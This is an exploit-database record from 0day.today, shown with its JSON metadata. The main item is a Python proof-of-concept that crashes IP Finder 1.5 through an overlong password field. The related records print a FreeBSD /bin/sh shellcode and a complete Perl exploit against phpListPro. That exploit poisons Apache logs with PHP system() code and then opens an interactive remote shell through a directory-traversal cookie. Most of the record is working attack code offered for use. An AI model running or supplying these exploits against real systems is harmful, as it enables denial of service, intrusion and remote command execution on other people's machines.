ID 1337DAY-ID-30872 Type zdt Reporter Shubham Singh Modified 2018-08-13T00:00:00
Description
Exploit for windows platform in category dos / poc
# Exploit Title: IP Finder 1.5 - Denial of Service (PoC)
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovery Date: 2018-08-12
# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script; it will create a new
# file with the name "exploit.txt". Copy the text inside "exploit.txt",
# start the Search&Config Tool program and paste the content of
# "exploit.txt" into the password field. You will see a crash.
#!/usr/bin/python
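# Build the crash-trigger input: a long run of a single byte that is written
# to exploit.txt for the tester to paste into the password field (see the
# reproduction steps above). The length is a named constant so it can be
# varied without touching the file-writing code below.
PAYLOAD_LENGTH = 1500
buffer = "A" * PAYLOAD_LENGTH
payload = buffer

try:
    # `with` closes the file even when the write raises; the original only
    # closed it on the success path.
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as exc:
    # Narrowed from a bare `except:`, which also swallowed KeyboardInterrupt
    # and SystemExit and hid the reason the write failed. Reporting the
    # exception keeps the best-effort behaviour while making the cause visible.
    print("File cannot be created: %s" % exc)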
# 0day.today [2018-08-13] #
{"id": "1337DAY-ID-30872", "bulletinFamily": "exploit", "title": "IP Finder 1.5 - Denial of Service Exploit", "description": "Exploit for windows platform in category dos / poc", "published": "2018-08-13T00:00:00", "modified": "2018-08-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/30872", "reporter": "Shubham Singh", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-08-13T22:16:46", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "e84f3b9d55501048fea29c7280457ffd"}, {"key": "modified", "hash": "1865261413c3db59730e6f4c15d45b87"}, {"key": "published", "hash": "1865261413c3db59730e6f4c15d45b87"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "521cde1cee0485e7a9a347fe8363f9e4"}, {"key": "sourceData", "hash": "6b1d23f23b0064776c84e046c160b9fc"}, {"key": "sourceHref", "hash": "498ffd8be88a7cb6a1c9f0036e79b78b"}, {"key": "title", "hash": "aed8d65e290677342ef37e20894ae1fb"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "cb9674bc8a20f665869c23df16b0adc45264d7cdd5b362b5a5a959489a03903a", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-08-13T22:16:46"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13836", "SECURITYVULNS:DOC:30872", "SECURITYVULNS:VULN:429", "SECURITYVULNS:DOC:429"]}, {"type": "zdt", "idList": ["1337DAY-ID-7033", "1337DAY-ID-429"]}], "modified": "2018-08-13T22:16:46"}, "vulnersScore": -0.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/30872", "sourceData": "# Exploit Title: IP Finder 1.5 - Denial of Service (PoC) \r\n# Author: 
Shubham Singh\r\n# Known As: Spirited Wolf [Twitter: @Pwsecspirit]\r\n# Discovey Date: 2018-08-12\r\n# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder\r\n# Tested Version: 1.5\r\n# Tested on OS: Windows XP Service Pack 3 x86\r\n# Steps to Reproduce: Run the python exploit script, it will create a new \r\n# file with the name \"exploit.txt\" just copy the text inside \"exploit.txt\"\r\n# and start the Search&Config Tool program paste the content of \r\n# \"exploit.txt\" in password field. You will see a crash.\r\n \r\n#!/usr/bin/python\r\n \r\nbuffer = \"A\" * 1500\r\n \r\npayload = buffer\r\ntry:\r\n f=open(\"exploit.txt\",\"w\")\r\n print \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n f.write(payload)\r\n f.close()\r\n print \"[+] File created!\"\r\nexcept:\r\n print \"File cannot be created\"\n\n# 0day.today [2018-08-13] #"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:VULN:13836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13836", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\nHello 3APA3A!\r\n \r\nThese are Login Enumeration, Brute Force and Insufficient Anti-automation vulnerabilities in Catapulta I.W. Edition.\r\n \r\nThis is commercial CMS. It's used at web site of one presidential contender in Ukraine (the elections were last Sunday), where I found these vulnerabilities at 28.01.2014. This politic never cared about security of his web site and his site was hacked in 2009, so no surprise he used vulnerable CMS this year too and still haven't fixed holes - as these ones, as many others. There are many interesting Information Leakage vulnerabilities at that web site, but as I found they are related to site configuration or non-default CMS configuration and are not present at other sites on Catapulta.\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are all versions of Catapulta I.W. 
Edition.\r\n \r\n-------------------------\r\nAffected vendors:\r\n-------------------------\r\n \r\nPula Design - developer of Catapulta.\r\nhttp://pula.com.ua\r\n \r\n----------\r\nDetails:\r\n----------\r\n \r\nLogin Enumeration (WASC-42):\r\n \r\nhttp://site/admin/login.php\r\n \r\nDifferent answers allow to enumerate logins in the system.\r\n \r\nBrute Force (WASC-11):\r\n \r\nhttp://site/admin/login.php\r\n \r\nThere is no protection from Brute Force attacks.\r\n \r\nInsufficient Anti-automation (WASC-21):\r\n \r\nIn contact form (http://site/messageadmin.html) there is no protection against automated attacks.\r\n \r\n------------\r\nTimeline:\r\n------------\r\n \r\n2014.02.28 - announced at my site.\r\n2014.03.07 - informed developers. Ignored.\r\n2014.05.30 - disclosed at my site (http://websecurity.com.ua/7033/).\r\n \r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30872", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30872", "title": "LE, BF and IAA vulnerabilities in Catapulta I.W. Edition", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T17:21:47", "bulletinFamily": "exploit", "description": "Exploit for freebsd/x86 platform in category shellcode", "modified": "2006-09-26T00:00:00", "published": "2006-09-26T00:00:00", "id": "1337DAY-ID-7033", "href": "https://0day.today/exploit/description/7033", "type": "zdt", "title": "freebsd/x86 execve /bin/sh 23 bytes", "sourceData": "===================================\r\nfreebsd/x86 execve /bin/sh 23 bytes\r\n===================================\r\n\r\n\r\n\r\n\r\n/* FreeBSD 23 byte execve code. Greetz to anathema, the first who published *\r\n * this way of writing shellcodes. 
*\r\n * greetz to preedator marcetam *\r\n * [email\u00a0protected] *\r\n ****************************************************************************/\r\n\r\nchar fbsd_execve[]=\r\n \"\\x99\" /* cdq */\r\n \"\\x52\" /* push %edx */\r\n \"\\x68\\x6e\\x2f\\x73\\x68\" /* push $0x68732f6e */\r\n \"\\x68\\x2f\\x2f\\x62\\x69\" /* push $0x69622f2f */\r\n \"\\x89\\xe3\" /* movl %esp,%ebx */\r\n \"\\x51\" /* push %ecx - or %edx :) */\r\n \"\\x52\" /* push %edx - or %ecx :) */\r\n \"\\x53\" /* push %ebx */\r\n \"\\x53\" /* push %ebx */\r\n \"\\x6a\\x3b\" /* push $0x3b */\r\n \"\\x58\" /* pop %eax */\r\n \"\\xcd\\x80\"; /* int $0x80 */\r\n\r\nint main() {\r\n void (*run)()=(void *)fbsd_execve;\r\n printf(\"%d bytes \\n\",strlen(fbsd_execve));\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7033"}, {"lastseen": "2018-02-15T19:13:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-05-19T00:00:00", "published": "2006-05-19T00:00:00", "id": "1337DAY-ID-429", "href": "https://0day.today/exploit/description/429", "type": "zdt", "title": "phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit", "sourceData": "============================================================\r\nphpListPro <= 2.0.1 (Language) Remote Code Execution Exploit\r\n============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit\r\n# URL: http://www.smartisoft.com/\r\n#\r\n# Info: \r\n# - arbitrary local inclusion \r\n# - need magic_quotes_gpc=off\r\n# \r\n#\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n#ripped from rgod\r\n\r\n@apache=(\r\n \"/var/log/httpd/access_log%00\",\r\n \"/var/log/httpd/error_log%00\",\r\n \"/var/log/apache/error.log%00\",\r\n \"/var/log/apache/access.log%00\", \r\n \"/apache/logs/error.log%00\",\r\n 
\"/apache/logs/access.log%00\",\r\n \"/etc/httpd/logs/acces_log%00\",\r\n \"/etc/httpd/logs/acces.log%00\",\r\n \"/etc/httpd/logs/error_log%00\",\r\n \"/etc/httpd/logs/error.log%00\",\r\n \"/var/www/logs/access_log%00\",\r\n \"/var/www/logs/access.log%00\",\r\n \"/usr/local/apache/logs/access_log%00\",\r\n \"/usr/local/apache/logs/access.log%00\",\r\n \"/var/log/apache/access_log%00\",\r\n \"/var/log/apache/access.log%00\",\r\n \"/var/log/access_log%00\",\r\n \"/var/www/logs/error_log%00\",\r\n \"/www/logs/error.log%00\",\r\n \"/usr/local/apache/logs/error_log%00\",\r\n \"/usr/local/apache/logs/error.log%00\",\r\n \"/var/log/apache/error_log%00\",\r\n \"/var/log/apache/error.log%00\",\r\n \"/var/log/access_log%00\",\r\n \"/var/log/error_log%00\",\r\n);\r\n\r\nprint \"[i] phpListPro remote command execution exploit\\n\";\r\nprint \"[i] Need magic_quotes_gpc=off\\n\";\r\nprint \"[i] Coded by [Oo]\\n\\n\";\r\n\r\n\r\nif (@ARGV < 3)\r\n{\r\n\tprint \"[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\\n\\n\";\r\n\tprint \"[*] Apache_Path: \\n\";\r\n\t$i = 0;\r\n\twhile($apache[$i])\r\n\t{\r\n\t\tprint \"[$i] $apache[$i]\\n\";\r\n\t\t$i++;\r\n\t}\r\n\tprint \"\\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\\n\";\r\n\texit();\r\n}\r\n\r\n$serv=$ARGV[0];\r\n$path=$ARGV[1];\r\n$type=$ARGV[2];\r\n\r\nprint \"[+] Injecting some code in log files...\\n\";\r\n#ripped from rgod\r\n$CODE=\"<?php ob_clean();system(\\$HTTP_COOKIE_VARS[cmd]);die;?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>\"80\") or die \"[-] Connecting ... Could not connect to host.\\n\\n\";\r\nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"User-Agent: \".$CODE.\"\\r\\n\";\r\nprint $socket \"Host: \".$serv.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\n\r\nprint \"[+] Ok! 
Now here the shell, type exit to quit\\n\";\r\nprint \"[+] If it's not work maybe try another apache_path...\\n\\n\";\r\n\r\nprint \"[shell] \";\r\n$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"exit\")\r\n{\r\n\t$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>\"80\") or die \"[-] Connecting ... Could not connect to host.\\n\\n\";\r\n\t\r\n\tprint $socket \"GET \".$path.\"config.php HTTP/1.1\\r\\n\";\r\n\tprint $socket \"Host: \".$serv.\"\\r\\n\";\r\n\tprint $socket \"Accept: */*\\r\\n\";\r\n\tprint $socket \"Cookie: Language=/../../../../../../../../../..\".$apache[$type].\";cmd=$cmd \\r\\n\";\r\n\tprint $socket \"Connection: close\\r\\n\\n\";\t\r\n\t\r\n\twhile ($answer = <$socket>)\r\n\t{\r\n\t\tprint $answer;\r\n\t}\r\n\t\r\n\tprint \"[shell] \";\r\n\t$cmd = <STDIN>;\t\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/429"}]}